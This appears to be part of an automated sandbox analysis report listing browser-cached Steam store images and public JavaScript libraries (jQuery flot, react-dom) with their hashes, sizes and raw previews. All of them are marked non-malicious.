        Preview:.PNG........IHDR................a....tEXtSoftware.Adobe ImageReadyq.e<...'iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.1462899777, 2023/06/25-23:57:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.1 (Windows)" xmpMM:InstanceID="xmp.iid:399EA8C592D411EE91E8F6773DB0009B" xmpMM:DocumentID="xmp.did:399EA8C692D411EE91E8F6773DB0009B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:399EA8C392D411EE91E8F6773DB0009B" stRef:documentID="xmp.did:399EA8C492D411EE91E8F6773DB0009B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.d......IDATx.b..U.d``.......@...4.....0......PWU.p..Q....1\=...2I.\Fg.&3de.....BX..4 ...L...!#....... )!..7m..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):9520
        Entropy (8bit):7.939104626702935
        Encrypted:false
        SSDEEP:192:EkpJA5B5xJVbJ4xoHFCwT7qZ3R8rYEVtw7TcZ:PDwBRVbJBvTsh8UEV+O
        MD5:BD532EA374E04AB7078CE194653C290E
        SHA1:A1E73F153F7458B7E5994BEBBBFCB767CAD949C2
        SHA-256:262EBE638516040E5E4D97145071BCC1B738B7AA2C2909FAE5FEC13A200AF988
        SHA-512:B3AC31CE7287B38E2D00AC7152400882E044795F29D0315135CD341EB1FD9370A968C1A6E88677BFFADE01A6EB315BE132198E6EAB16B4EC6ACB6C10D28D0E25
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................7.........................!..1."A...#2Qaq...BR.3...b.................................2.......................!1.A.Qaq"...#2......B...b............?....../3W.VU.\...52..\........p<...W.'U....}{~...=[...w..q......s...z.]..6.. .G.. ..'.2+d..BO.....{....+....G]t.m:.4.7*w......@.3)... ...s..^....:.......z......q].....-E..$.t9VS....:.J.C..x.F.WM$3......?..U.B.=.PP...U2.M...HB...O].....~s..n......Z.6..V)..4MU5La...>.*+`.......C&l..c).../C.V.....+.....V.I...s.9...F......\.C..).t.j.N..UWO...I#9RT.........6.../1]WZ....S..3........ .G.....N9..[ [~.r..d....{=....J.Y....8...l.I..u......5]..Ti.Z.}9..S........3).[.V.D...^.OJ..:....<x9....[d.l....`..."..A(y...!.s...GU.....x-q.qU..e.br......=:....7..w..M.G...uW\...).>r........B......O...w.{`..p........w...8....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 291 x 107, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):25286
        Entropy (8bit):7.987583348057773
        Encrypted:false
        SSDEEP:768:oiqlwBKgZDTSqA5UXqJ0gGocupTTgM7YCNPi1GBN:Yl2QDJ0pocwgMLFzX
        MD5:E0B66ABD08331C9AF1034CE915A5E1C7
        SHA1:3010E55C0566A30CB0C71D6A182E09AF7DF3CBC1
        SHA-256:15442D410E832F6D63C620956D87B7C50346FA6B6E6BA233052D2785ECB5212B
        SHA-512:25F553BDA1BD5DDFA028B708260C4B98675FD6F199495374051E74C955C56C80FBFBF2ED40D11E8A136E4AA6C1A3F25895712C03065B539F742C5A031EFE54C3
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images//gift/steamcards_promo_03.png?v=1
        Preview:.PNG........IHDR...#...k.....<\.....pHYs.................sRGB.........gAMA......a...b[IDATx....\E.>.....m....'...$..A.Q@.WV....w...tf...:?...(....,A..........}.o.k9..n...D.....w..u.o}.;.9u.(.B).B9...k.L....X.%R....B...x.v..(.B)..Hy.............Vo.+tZ...e.[WU.P..P...5.F..T@\)J.9."...o.g.7.x.z..>..bN..kZ.Tto.#...zY...P..oR^3`4i....m..1(..kRT.../..........dv.J.v.....j.."yo$Rk.7....+.B).._^3`4q....9...U......^.I.H.'._...rP....)W.A.}..'.Z..=.$.M.`..J...2...N={h.${"^E%..R......qXB...o.mB...fJ....n{r.9...^....d...8.J........o...U(..T.ac.7.JlSh.Vh1\F..l-.t.R(...0.:...9.=.F....%..#5t.2_.7_dx..F..f.R...."...0.c.P.z...z.{....i.5[...<.....C.M.{.k..}...n;.|.|....v [..........!....J..........XV.!(.B.X.p.4g...D../E..WC...v..R..... .......f..DA..M!...P..~T..)..TO~....n,^..$1.m...........R...V..Q(..[.."J)....Y.5m}.hN...A.W..$..T....L.B).1i..2..V4~.F}.........Q../y.{.a....T.O2._w.%.;;......O.>!\..=#$I. ... ..!...&3.k..u....%.C.u.J....3$.[8...2...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):3149
        Entropy (8bit):7.767927625415787
        Encrypted:false
        SSDEEP:48:vozjUQ9Ulm0gZIbyhc4uHvEk4y4vkqzA+7a1Qwg1yDCGnlHPQZ:QzYQ3yLzHv4P8nk1yDCGlHPQZ
        MD5:49070C5878D6755F571686741BDB1696
        SHA1:3C6EFCC5BB3E5B09F97B4C498A6895F32384BE81
        SHA-256:F560C50EC9C260E76FEFC066C174A318CACE6734D097340AFD05BD893EEF15D0
        SHA-512:0AD0D2A3DE7DDA04CE1117E7C31D4EB1787C261500490C2640335ADFB5D89848CFF6728BADF874A036C34F45EE687B0284EA09B95A7C044A9B06BCB71B86ECD1
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/capsule_184x69.jpg?t=1716311593
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................3...........................!.1A."..Qa2BR..$%3q..................................1........................!1A.Q.2aq......"..3B#b.............?.......P..@(......P..@(......P..@(......P..@(......P..@(......P..@(...*.....)=E..P..@(......P..@T!G.......P..@(..?w]...Z..$.C.2.K.,o.R..".8o.Y......C.Y.X..1...~...a.r.,L?.).....H.BS......]6.*...eI.Y.8..]]..iW..y.n+n......>.8.....k...m.[..K..).A.^G....IKCD...s.q..v.l.Z.....ci.c....{...S...%.8....)$..........O.RI)4H7.5.|o.......rALhL..-......<...J..l...Y..,...P.#)7.w.}=7`...i.x.#..(..s!..w..i..V.py.....5..BQ.8.}=..8.y....a........q........2.&C...P@..%J..........uq.%..s\..7........#....~..F[kQ.c..D..J.....e(.(..n.Qr.k...^.."P..p....a....P....m6.nl.Q.u/..S..Q.....^.b...p.....,.5.b....[-...q.Jm......XN.>...js.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):20903
        Entropy (8bit):7.976903648149348
        Encrypted:false
        SSDEEP:384:xHP8wMSlwZzX/19SHilmD6byuE9enykvDtKrEY5YD6Urzy:6SlwJtgHGJyzM9xKwY5YD9ny
        MD5:1B46842FFDAE52A3146AA7C7B0403C17
        SHA1:72D9C4017DCA525511663E2B3D950E87F793AF2F
        SHA-256:80D33547731442C41B67404B2F37DEACD6B75728A2FB30E9C25D7205492B48B2
        SHA-512:0199BA892F893FFA035EE39977E2AC75DE3F8F2A6617BAA99711FD1F63A56E9D9796B3960B8BBBC488D87FF4623637CF19C0B9B5704FBD5702C2CEB012D84BD3
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.........................................................................$............................................A..........................!1A.."Q..a#2q...B.....R....3r.$Cb.%4.................................3.......................!1.A.Qa"2q........#..B$3.R............?..."....y.qR...l.=...n.(0J..dn...TO.A.j*z.8O..>.g$.16.<.q.n..9G..1. X.^...3Y.3...).....F..!&.A^W.`/...ok.m..3..O..E.k.N.4..R.h..,H,. ........8.PO..H./..AU..TY.u.!..Bj.....).6.r.._.{..n.c..}E..7.U...<.Q+.f...;X@..7.M.~.........Cl.!..(.Z....@........N..X1.>[.^8..$.......\_.~...&(...3p2..E..3.B>...b|V.i..+..4.H....#..QCv.....:.q.7.c...]=V..B.G1..Q.......e..zv..:....9P.o....$...1D} ._..u.D.Z.....E..a..pD.i*Z..O...>.\MJ....t....c.]...'.F.....:D........I.....=N.y..5O.y.....O.d=..[.U}.lx=..8..%u.{.f~.B.(...*..5)..;l;...#.I.R...h..,6..`7.;.{{b. ..6...[{bB.e.qT.f..=F"..V*.I.)C.F...+.P.z......80..R....k..|s
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):124353
        Entropy (8bit):7.97763339842992
        Encrypted:false
        SSDEEP:3072:c7ee/63TWViQh35oo5Kwo5VVzKCQeQIMLvBYvsVdKO:w/6DWViQB5ojp1zK74MLJLVgO
        MD5:92F220FBBCEA5CB0E5B24E83413E71BA
        SHA1:1BA3A271E1C29043474A8CAE2F529564471EE218
        SHA-256:9E3BC77CE738534FEA3BBD1D8B85D477AB10EDAF31CEA25BE8DA7A87F91FCB29
        SHA-512:904C5BECD3D51C1A1369CA65E2ABA978CAEEE6EACDFA8FE0DE0F48651E26790F80B77EC6058E6419442EA95E8E833ABAD54C52C68AFD8B3487657E2B97BF1C07
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................S.........................!.1.."AQ.a.2q.#B.....$34Rbr...567Cst..u.....%..S...Dv...................................=......................!.1.AQ."aq......2...#3B4.br$CR..D.S............?......).*^..U...:..+..F>%Rx.....E...."..?..8.!..T.?...b.i...T...4."*.s.k+&.....3.@....xBx...r%......`zE..e.S.GYCM.0.@.`..0|...>GN.a....H6#.4......^Kn.....1.,C.....U....h*....dh..0...ib.......... ...H..AX...[....o.u..&..T.RjM.V...kU..d1E....`2..(8...>o..."..x.../..U.....+I}...//..^.o!......U..U...H..].0.MvO.......n..j....TGY.3y.T....r..>...A...J.(8g:Ng..kw>H5.......9..9.E.}...af.Ny.>....[(.....Jy.....k:?SIm.tr[>..i..M=.F.....4[..9...'..PH.G0{N.;U_..(;.+>.f..O........0WO..Q=+*.....2....pA..u8@..c.G....Y.;I.22....zg.M/Kr..*5$7...L.L).'..Y..A..v......m.K"$......H.......&...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):29429
        Entropy (8bit):7.974386675285291
        Encrypted:false
        SSDEEP:768:tf4mCRQqig3iyIi3hj8Xl8AESJezJ0nLDG:tf+Q2cixgXlN60La
        MD5:913E34DCE1EA0ABD2A96B6B63A310BFA
        SHA1:4629FC6549A07B83F16C4E3AC1B650732A355A49
        SHA-256:E051DCE359924528C77F2B1ECA30AA37B781C69AD84A009C215400FCD4E5F143
        SHA-512:8C0D62EF529F5DDD653E3AE1722F17A0764D0DD415CD9A5F77B53974D11C2580871E84483E5924962E10BD4E725A7D6E13C1AF6C2B300C805F78F90A42AEA905
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................j...........................1..!Q.Aa..."Rq...23BS...#CTr......$4FUVbv.....%5DEGcfs.......u....'6Wdet.......................................P...........................!1Q..AR...Saq......"2BTs..345Cr....bc....#$%&6UDE.............?..e....B..."..Q/l(.B2.-.8..R...wf.p.Q..X.".b..........?z.P.d.S.1..xD.!2x"UF....D.T.8.........P)../.Q-.iQ0.$S6..U..@....$.^!..hh2..6 )...=`.D.F...L..i...!..P.I..C........D&.......$Wv.".....3..P...."SJ.y.!..A..Yx&.N=B..D..TG.q..$J@.h'.JRES..}A.4...G.(...L.)J#L.........dP@.......2.;R....Bv...B.......8JQ..aeNR....@...#.R..P.E...T...A.....!....B%$.......x..JlN0.$.7.i &.....&.....48I..B.<.....D....Z.!..0...a.."U.dQ.....x!D......S......N.... .r.0U..*.L..".r.x.....).R..x...<..(g.>uX.".o.)..*.`..g......}.2.oL....!......n.}";.J....?L......u.Q...K
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7951
        Entropy (8bit):7.938505936540078
        Encrypted:false
        SSDEEP:96:dwfXuGRkRwP9sfKFJHUqgcvG0vEx2MbDEuox+cFzRMdBcPkMlpI16O3o99xTj:mfNl1MSHUqgAGVnkXxpFzwKPkIoG
        MD5:E1C4EC18E951C719D17BB6D24EAF9C31
        SHA1:3D6740E2F540BD6C1C0C30A262F1108C757B9AA4
        SHA-256:2EDF08EA9F5C55AD01FE459A61DC61E50353912E82A19A39AB4FDA32B879723B
        SHA-512:05D92B51ACE71853B9987C70DB090804E8088D3321D14B02367598909189902B4B930D5CCD8E6E7A95F2DB473D2F025BCF794F66A2D8FACD2AF515F3D5501D11
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................D............................!."1A..Q#2aq...BR..$...3r...%&'CD....................................1.....................!1..AQa."..#q....2BCR.................?...@*...............}.l)5..U\q.....J...[...Z2...A...uX'.ridcu3.U#a..%.@.._-..l..9..rc..:....AG..B..H:.DO...~..t.h.^5.....].]....\.!*!..Q.....O.....Lk.?.V..wekMn#. .w.....S..Q..!$x.q'.q9.?t...F..'O.8w.~..m...sU92.....T.-!...1.^.G.C.^.._....T.m.......3m..f.|.e..nx%i..9yB...C.{....v7x.[.=`.b..q.Pr...-.K..5`$....g..ZaR...XQ.cu..:UM.+U.T.2<`..[...PV...Np.@..#...5......g...{...S.*Qi.**h..]..O........... .8Rn..[......:I.o...[.:.B..dxi..<R.>.^....[.......t...t.zn.[.......UM...J[Qq......x..@......].o^......cw)..UF.1W..x\....0.p.]Onc'>...-.{|.7:..m..{3P......E....,2.C....y].!......].2RuBv..Jm..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with no line terminators
        Category:downloaded
        Size (bytes):104
        Entropy (8bit):4.94506850744562
        Encrypted:false
        SSDEEP:3:O7IWSJMunSMionA51E0KthfjwlX+a8VtdKk18EiAl/n:O7IjJMPknA5+Blqua8VSa8Eln
        MD5:D73473B4A51C35EFFA403C7BD7E4266C
        SHA1:68B942D36A37C49BF9F4BD001C93E26B1BB296A1
        SHA-256:FBFE25CF87B8AC58E1DF80BB6C6B10B0DE02E4D9F10B684EF7DDF4DC74E7AAC8
        SHA-512:410F7ECD3EDCAC50BFB0FFE02FDCC6940EE368204277C7BBDF0DF2149FC2C8AE9F4E4D7C2D8EEE147C7FAE66E2AECEAC1FE2F63DA3CA97F6F26E1D3195957D7F
        Malicious:false
        Reputation:low
        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISJQm73uXsdFo4KRIFDY2QFPkSBQ0J2-sPEgUNvRt0bxIFDRHRno8SEAkKrp2xjgKqNBIFDY2QFPkSHgnN7uGVeELvPBIFDQnb6w8SBQ29G3RvEgUNEdGejw==?alt=proto
        Preview:CiQKBw2NkBT5GgAKBw0J2+sPGgAKBw29G3RvGgAKBw0R0Z6PGgAKCQoHDY2QFPkaAAobCgcNCdvrDxoACgcNvRt0bxoACgcNEdGejxoA
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7340
        Entropy (8bit):7.940077484745219
        Encrypted:false
        SSDEEP:192:6xM/jQMq58pzu/t5Q43TVUMNW5bobPufM2CjNgwf2y:6oQMq5kzm5Q4W2bPufLCRF2y
        MD5:B83E765D7CB0D2D1AD427524EB3F5C7E
        SHA1:B4725659FBB8FE8A70338DA8C41BF02E36E7596B
        SHA-256:404986DB2FCA9B77E3CA1204C40427929FD791BF2E54437470CB29457D39BA15
        SHA-512:98B2CE7E523C22562EDAB882855D146610AF33D1A30CC85882F51D3E039FCEDC65AA0FED30E476FAC45D88A0F4EC9134C78A9ADAFAC803F200FBCE229DF74565
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@..........................!.1.AQ.."aq.2...#$.%BRr....45CSc......................................:.........................!1.AQ."aq...2..#...3BR....S.Cr.............?..w.'...ax...t....6......l..(..X<...P.P.+..)..za..E......kI...>...$....y...V...g...m.z.o....+..s.3.[LR.~....D..t.#..T..*..{~B..CI.s[..`.....(.l.S...P..j.;..........n{:..=~..F...-.;0;.#...w..M.3....+..jj........$v..T.j.....yt.j_3........a.i..YER.V...x.1o.T..._.x.Z\K4.?.Rig].y.....sL...hi...Q...j'..O.%.......M._..M...x.xK...e."...$...?Aw.}.u..b.-...a...`.^..b.............s..;x.....l.Z..axg..&.U..-...G.//;...Ru.9..il.....W&G.........6..h.EIj.2......}pci8.7U.,.C..oN.r.@:....n...5.p..|..j.......|...*[..C....b.fid.;...=%..j.C.e..}.A....,..O6.......n..:.!uN......][..-.5:.mN}.v....k^.n..=..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (2203), with CRLF line terminators
        Category:downloaded
        Size (bytes):2350
        Entropy (8bit):5.204578961246277
        Encrypted:false
        SSDEEP:24:vNx3bGAlywgmWVIOqywYm0UIOG1WqGZuBDLrZOAlgoOkGjKoQQpyJ8Gq6soaJyrf:v2V/wYTUBq8uVrGjYwyORMrS0xXm21w2
        MD5:F3BCB2803A236DCD1524DF82D4733FBB
        SHA1:D1D12C8F8FAE67264F189ADABD10F7D78332A7FF
        SHA-256:D2A4C4226C6E35A95F808ABE403921DA3C91452DD65CF45ADC731A71F66C803E
        SHA-512:D62F47072D8EA56C67E017DEE69B0704399CA30E6D4629438D8093D92C8C4956ECC729EC22525B500B68200E9546F59F9F958A5016C51EC33480F83623A3302C
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/javascript/flot-0.8/jquery.flot.resize.min.js?v=.4PeWDSmdkiqV&_cdn=cloudflare
        Preview:/* Javascript plotting library for jQuery, version 0.8.3.....Copyright (c) 2007-2014 IOLA and Ole Laursen...Licensed under the MIT license.....*/..(function($,e,t){"$:nomunge";var i=[],n=$.resize=$.extend($.resize,{}),a,r=false,s="setTimeout",u="resize",m=u+"-special-event",o="pendingDelay",l="activeDelay",f="throttleWindow";n[o]=200;n[l]=20;n[f]=true;$.event.special[u]={setup:function(){if(!n[f]&&this[s]){return false}var e=$(this);i.push(this);e.data(m,{w:e.width(),h:e.height()});if(i.length===1){a=t;h()}},teardown:function(){if(!n[f]&&this[s]){return false}var e=$(this);for(var t=i.length-1;t>=0;t--){if(i[t]==this){i.splice(t,1);break}}e.removeData(m);if(!i.length){if(r){cancelAnimationFrame(a)}else{clearTimeout(a)}a=null}},add:function(e){if(!n[f]&&this[s]){return false}var i;function a(e,n,a){var r=$(this),s=r.data(m)||{};s.w=n!==t?n:r.width();s.h=a!==t?a:r.height();i.apply(this,arguments)}if($.isFunction(e)){i=e;return a}else{i=e.handler;e.handler=a}}};function h(t){if(r===true){
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 616 x 353, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):294395
        Entropy (8bit):7.994026202915126
        Encrypted:true
        SSDEEP:6144:umeHaIObWLdeDKpSuuj0ow3uz+JCinvHUq2Yyy3dGeaEYJGDLP3h6yp:xs4qjRm0TMjqFyyBTYJELR1
        MD5:8FF9754FDE116569A1A46980B5B253C9
        SHA1:D2A21F18DD0B3DD4CA4F7DCEDE164B0B4A2FB4E8
        SHA-256:71C27F345F9C30D654EECF9AA507ABD524D73FA513AA36F72539850BF42D8316
        SHA-512:3AB164A3CCEA4FF7A9E7836BB6F820DF3912FDFAA192DE28CFD0E937D8FC118A6F5E2016F7EE56CD94B66D45369A240BF542000B0CD467DCA374845E265FA76C
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S2_616x353.png?t=1705420866
        Preview:.PNG........IHDR...h...a.......V.....pHYs.................IDATx...Y.5]..."V......5w..lv5.n."..(.,.,......[..].#..0|.._..0`.2e.".Z.%..l...5O....3.Z.X...Sx.9..3....L.....H|..7..."..._..H|/..f.gQ.C....o.....^...".{.....w.c.=.`.c...=.?.....w.........,..(Z..}..z..:`}.WD..:X.....U}.^3....>.........(eR....*.... Z.Q.;F.X..%.t.6o,Q......m.,.....z..X.f`....:...p8L.B_..;E.x$...0A....._4>o..X/.._!d.`.f=d1.8.R..:.....n...UoCFT4d.@.Y^;.......-A.nXo!..7....4.D.i..R\...L.=...wz7Z_.kci.?.uZu9o...R-H.D7.#-...E..C!.HG...jq.....dw....)....10.w..SA,.'..4.~)..N.<w)........-!+."q..4.T...5.U.."0)....s.I.C..<*.K=...r".BG1..U. ./V......T...G.......B)B._..?..{S.%.7.J)JQ...s.......)..2....:.XCE0:~<..P.".=.f....T......,..FJQ.G.&d........(R.U..2ti...c.AZ.e>..?.S....>7.?.?....|.g...O?y.v..?........F3C...0U.n.8?<`(........}z.......a...rY...N.f.eY.\..SW.^..6.Gm...s..?.i.L.".ZW:..Z...X#.7..x..7.Yk.7.pss..x../....W../...sY+.5..o...~F...Jk.....i#75 .. X...MU...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):8276
        Entropy (8bit):7.936447857784797
        Encrypted:false
        SSDEEP:192:Ay/CZFhYBljjgZ/5OmWVVr36umhUS7CfK2juUWVy6X9z:A9FhGCYmmRS2LOy6X9z
        MD5:E0FC9725FA33C8180D5693333EDEA8DB
        SHA1:2E55132C18E00A8A274B378CB3460D96BFE674AE
        SHA-256:2060DFA4F83022911E811A035515289ED51AB1CD0BB1CFE072310BF46D2FE54D
        SHA-512:E4EEEEB398A8FFD81BDE518991EE7457A3D75CA8ADB29FC811D19D0D77D01461171B5A3A2D09185264EE95ADFEF4C2E52F4F0B7AD313BAA588E368C468C8495D
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1142710/capsule_184x69.jpg?t=1716536507
        Preview:......JFIF.............C....................................................................C.......................................................................E.............................................<.........................!.1.."AQa.#2q...B..$3R.....Cbcr..................................4......................!..1.A.Qaq."2.#B.........R..............?..:B....5....VH.E.{..j\qJ..k.....~..I=...f...r......F.HjJ0u.w.D....`8..:.r...J.q.vW...6..S40C..K/.H.....=....3...f.+^.`.h.YSl_.[...9.c.MG.`?X...4.m?e..d.8RI..W..Qv....|.S..to........}.'.lz.....A...mIS.P.E5.W.I)oTM.r.......6...<.[.^....\A....a.....r.....5(\c=]Y....u....}...{..R..xc.mE.b......\.i.....#a.' ..g'#..z....Z.G&.~.C.....O..X|,..%.k....E.....`......h.8}.LF.....X...o..$t....*.....I..?.}.Mk..?eU^,.V..i+if......F....H.q.\...M%.(=E...r~.K..`9..P.MR)....5-.$a9.jGL........wZ....<..J..i......J........j...d.I>.?.U...TS.......U.R.C.....st.K#G.Wp...V.B./.R.U=D..~ ...../..X........S.Xvo...".
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):3133
        Entropy (8bit):7.878926440205633
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODVxj1yWJ:VSDZ/I09Da01l+gmkyTt6Hk8nTjjTJ
        MD5:2369B839B9785EF55718452E674A45C6
        SHA1:EBB0C36D260C53308855DA5B3B7D38B1F767D84B
        SHA-256:CDECCEA3FFAFE66820780DD41F2231E99976467FA8363481F16D91C4B8435739
        SHA-512:FAC4A2A58BA3A582AC62761CFBEF66106607EC20FC31F2413DAEEE61408CB034C374F7F002A3A569D160266B6F3D37DB273B74AA862AAEFF3B6C91BD8CC31FAA
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (945)
        Category:downloaded
        Size (bytes):131882
        Entropy (8bit):5.376896897488642
        Encrypted:false
        SSDEEP:1536:XtTqru1xouE1ZTnPrMiY6WRdA2qZpXnBnK3xsVdFE7zptEvp62kdS6F:JmuWl7ndK3xsVdKEd56F
        MD5:64141792105EA4861F9F33294D65AB81
        SHA1:506D9100CAA070005A890BD496DE64C437D6D008
        SHA-256:21758ED084CD0E37E735722EE4F3957EA960628A29DFA6C3CE1A1D47A2D6E4F7
        SHA-512:30E0A9AA84688AC093C09F2F41089C899BF4A9CA5138289D7A4DC64C54BA293936FB2EE6BA724894A09590509863EA7712B6055C28E61639DF4D34520B538759
        Malicious:false
        Reputation:low
        URL:https://cdn.jsdelivr.net/npm/react-dom@18.2.0/umd/react-dom.production.min.js
        Preview:/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(Q,mb){"object"===typeof exports&&"undefined"!==typeof module?mb(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],mb):(Q=Q||self,mb(Q.ReactDOM={},Q.React))})(this,function(Q,mb){function n(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function nb(a,b){Ab(a,b);Ab(a+"Capture",b)}function Ab(a,b){$b[a]=b;for(a=0;a<b.length;a++)cg.add(b[a])}function cj(a){if(Zd.call(dg,a))retu
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6081
        Entropy (8bit):7.914765182563518
        Encrypted:false
        SSDEEP:96:DNlhrwaQujhPBjQwjU6pNrAxy07TeohrV2dhUsxZAKlgdfeiCjl6fP7/0jq/:Bl9w2jhPBjQSU6/Qy0nhro1vA6gEIfPR
        MD5:14404A67A4A0FF17B73F8FA05193BBA4
        SHA1:D447EB1E4247124AECEA049F92C414DE3922B5E5
        SHA-256:3C4190F10B94E8B1CE7014004F5CE8AA29CA0F3A4C26261D41AF714C3B03139F
        SHA-512:7220C48D3863113CDCC076365648B0016067E160674F9622B8EA8E9B9F1E9C6999C7ECCFDF053D2EAA5011B425BE2E0E0C212F1AA2ED220B087618B25796A477
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/377160/capsule_184x69.jpg?t=1712851055
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................E..............................................F..........................!.1AQ.."a...#2Bq..Rb...$34CS.....5Dc......................................-........................!1A.a."2Qq....#...............?..t...X..m.=.8.L}.4"..'U......-..'P.......B..*....q..C.U....$.uicE..b(m..J.%..).q....9bEc.Z...[.6=w..+...0E..........l>.....|..G.....V....0..q.[=f.....}..5.R+.^u..X('.*]..)(R....lj...O&o.....Jj..2o.h...g4. e........-..F.....8...'b..v......w.n..o.....j..#......U..<Z..I-.Y....B..y..j..(I7=.ltt?..k&.TW./..d._.......KL..[.2..TjR]2*U.f.*.U..Y=..@|............J.p......7B.1..`..K..H.....8.....M....,..iM....q.Sj.IIB..k \....w.F3....+.........]1..7..`1.vX..%./T^.k.....m..\.....?.iVG%..~...lK&v.\U.6.?.|U.!O.!C.<...M.[d.J...v.S.....z7.vBX...}{......A.#.6..Pm....J#....`l.`..?..^.G..UIv......=<...:BH*;m|z[(..
